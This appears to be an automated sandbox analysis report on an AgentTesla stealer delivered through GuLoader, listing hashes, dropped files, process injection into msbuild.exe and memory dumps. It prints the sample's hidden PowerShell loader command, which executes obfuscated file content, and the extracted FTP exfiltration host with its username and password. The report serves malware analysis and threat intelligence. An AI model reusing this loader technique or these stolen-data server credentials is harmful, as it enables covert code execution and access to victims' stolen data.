agenttesla | 844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41

General

Target

844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
Size

699KB
MD5

9444e71802e12684478363233fd62c92
SHA1

f2b4bd9162b591b2a2f4202934145864e16053fb
SHA256

844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41
SHA512

fec573d2b453086f2ed0b8b11824e4626fb3712134a707f100b9b2704c489fffc1259646979b0c7ebeb032421163b35beed13d2772ac02a7dd08bf7723821805
SSDEEP

12288:WwFGHEXEzFGj9F5qx5DJlm2HlzYmdMylgimtdYM3O0V7bbJ:W5HEXl9y1lrz7lgZtub0V7B

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.vvspijkenisse.nl
Port:
21
Username:
[email protected]
Password:
playingboyz231

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1704	msbuild.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2528	powershell.exe
1704	msbuild.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2528 set thread context of 1704	2528	powershell.exe	31

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Kldebonnets.kod	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
File opened for modification	C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
File created	C:\Program Files (x86)\cockling.lnk	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
File opened for modification	C:\Program Files (x86)\cockling.lnk	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Calottes.Doo	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
File opened for modification	C:\Windows\bagvognen.lnk	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
File created	C:\Windows\bagvognen.lnk	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
1704	msbuild.exe
1704	msbuild.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2528	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	1704	msbuild.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1560 wrote to memory of 2528	1560	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe	28
PID 1560 wrote to memory of 2528	1560	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe	28
PID 1560 wrote to memory of 2528	1560	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe	28
PID 1560 wrote to memory of 2528	1560	844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe	28
PID 2528 wrote to memory of 1704	2528	powershell.exe	31
PID 2528 wrote to memory of 1704	2528	powershell.exe	31
PID 2528 wrote to memory of 1704	2528	powershell.exe	31
PID 2528 wrote to memory of 1704	2528	powershell.exe	31
PID 2528 wrote to memory of 1704	2528	powershell.exe	31
PID 2528 wrote to memory of 1704	2528	powershell.exe	31

C:\Users\Admin\AppData\Local\Temp\844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
"C:\Users\Admin\AppData\Local\Temp\844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Obscurantic=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple';$Ejendomsselskab=$Obscurantic.SubString(49841,3);.$Ejendomsselskab($Obscurantic)"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Rkkens.ini

Filesize
32B

MD5
a8ca1db6ae34f5e5c152094f44f92476

SHA1
9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

SHA256
1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

SHA512
e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

Download Submit
C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Indoperere.Bag

Filesize
299KB

MD5
740aba5e4e37d6e24e6322b0fb20b7e7

SHA1
6b92a45c9b518e1fe51192c27bd81db51f2b90d4

SHA256
a47e49459ad8874693970dbe048982e5afd0ffee2644e03a3ac147be2d012609

SHA512
2aca469279d46bbfc84fac52ee8ebdf8b58256f9009e7651480bc8d0fb07327107ee71e526783e8553e499f38a4b977de3e3fdadd4bbda9c8df37423a21c81f3

Download Submit
C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple

Filesize
48KB

MD5
b37bbcef093ffdd4c3be4dc919f6e830

SHA1
5ef5132e6f4021d672ba3844d2542e2258d22b72

SHA256
0c0dcc2234bc3f9baf5c35eb8ea2a77ca0e93015a6cb05de69890893a4b6daad

SHA512
9e8a8e2b84f366c0fc2edfa43c6781e88f99621549f0564efadd9d8facc975d1bbab048663b7c6e13ff53444d4f98d058664040dd6c67fde01a7500f38f3a9ba

Download Submit
memory/1704-186-0x00000000003A0000-0x00000000027FA000-memory.dmp

Filesize
36.4MB

Download
memory/1704-181-0x00000000003A0000-0x00000000027FA000-memory.dmp

Filesize
36.4MB

Download
memory/1704-193-0x000000006EBB0000-0x000000006F29E000-memory.dmp

Filesize
6.9MB

Download
memory/1704-191-0x00000000003A0000-0x00000000027FA000-memory.dmp

Filesize
36.4MB

Download
memory/1704-188-0x000000006EBB0000-0x000000006F29E000-memory.dmp

Filesize
6.9MB

Download
memory/1704-187-0x000000006F2A0000-0x000000006F2E0000-memory.dmp

Filesize
256KB

Download
memory/1704-185-0x000000006F2A0000-0x0000000070302000-memory.dmp

Filesize
16.4MB

Download
memory/1704-183-0x0000000076F20000-0x00000000770C9000-memory.dmp

Filesize
1.7MB

Download
memory/2528-177-0x0000000006370000-0x00000000087CA000-memory.dmp

Filesize
36.4MB

Download
memory/2528-180-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/2528-179-0x0000000077110000-0x00000000771E6000-memory.dmp

Filesize
856KB

Download
memory/2528-182-0x0000000002C50000-0x0000000002C90000-memory.dmp

Filesize
256KB

Download
memory/2528-178-0x0000000076F20000-0x00000000770C9000-memory.dmp

Filesize
1.7MB

Download
memory/2528-184-0x0000000002C50000-0x0000000002C90000-memory.dmp

Filesize
256KB

Download
memory/2528-171-0x0000000002C50000-0x0000000002C90000-memory.dmp

Filesize
256KB

Download
memory/2528-169-0x0000000002C50000-0x0000000002C90000-memory.dmp

Filesize
256KB

Download
memory/2528-176-0x0000000006370000-0x00000000087CA000-memory.dmp

Filesize
36.4MB

Download
memory/2528-175-0x00000000054B0000-0x00000000054B4000-memory.dmp

Filesize
16KB

Download
memory/2528-189-0x0000000006370000-0x00000000087CA000-memory.dmp

Filesize
36.4MB

Download
memory/2528-168-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/2528-170-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing